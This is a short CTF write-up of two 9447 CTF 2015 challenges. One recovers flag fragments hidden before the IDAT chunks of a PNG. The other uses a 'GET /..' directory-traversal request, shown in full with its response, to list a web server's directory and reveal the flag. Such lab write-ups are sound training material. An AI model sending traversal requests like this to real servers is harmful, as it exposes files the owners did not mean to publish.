9447 CTF – 2015

Another great CTF again this year. 9447 ran smooth. I did not notice any challenge issues. Typical challenge categories web, misc, reverse, exploit, and stego.  All challenges were very good. Here is a short write up to the two challenges I was able to complete. I Look forward to next years CTF!

 
imaged (90pts) 1 day, 22 hours, 6 minutes, 9 seconds remaining Our spies found this image. They think something is hidden in it… what could it be?

Image is just a plain rectangle box PNG

imaged

Ran through the normal tools

pngcheck imaged.png
OK: imaged.png (2997×14595, 4-bit palette, non-interlaced, -0.2%).

ran through strings
strings imaged.png | more
IHDR
9447
0PLTE
H40t
0l(t
{Ste
IDATx

I see the 9447 start of what looks like a flag so open it up in a hex editor

hex

I see the 9447 but nothing after it looks like a flag. Looked up the PNG specs all the pieces seem to be there nothing extra/optional in the images. Then I just started looking at each chunk header just to validate
Again non of the optionals are there. But there is a number if IDAT entries. And just 8 bytes before the first one I see a {Ste
That looks a little like a flag. So I search for the next one
and its g0_r
then the next one edun
and so on and so on until I come up with the flag. SCORE!

flag is 9447{Steg0_redunDaNcy_CHeck}

———————————————————————–
YWS (130pts) 1 day, 23 hours, 15 minutes, 17 seconds remaining My friend wrote a cool web server. I’m sure he’s stored some great doxxxs on the website. Can you take a look and report back any interesting things you find?

The web page is at http://yws-fsiqc922.9447.plumbing

start BURP proxy
start clicking through BURP discovered link for flag URL

doing a
GET /.. HTTP/1.1
Host: yws-fsiqc922.9447.plumbing
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

response

HTTP/1.1 200 OK
Server: BWS 0.1
Content-Length: 336
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>Directory listing for /..</title>
</head>
<body>
<h2>Directory listing for /..</h2>
<hr>
<ul>
<li><a href=”/../9447{D1rect0ries_ARe_h4rd}”>9447{D1rect0ries_ARe_h4rd}</a>
<li><a href=”/../.”>.</a>
<li><a href=”/../..”>..</a>
<li><a href=”/../gws”>gws</a>
<li><a href=”/../files”>files</a>
</ul>
<hr>
</body>
</html>

funny going to /.. with a browser did not display the page. Just sent us back to the main page.

FLAG IS
9447{D1rect0ries_ARe_h4rd}

 

Leave a Reply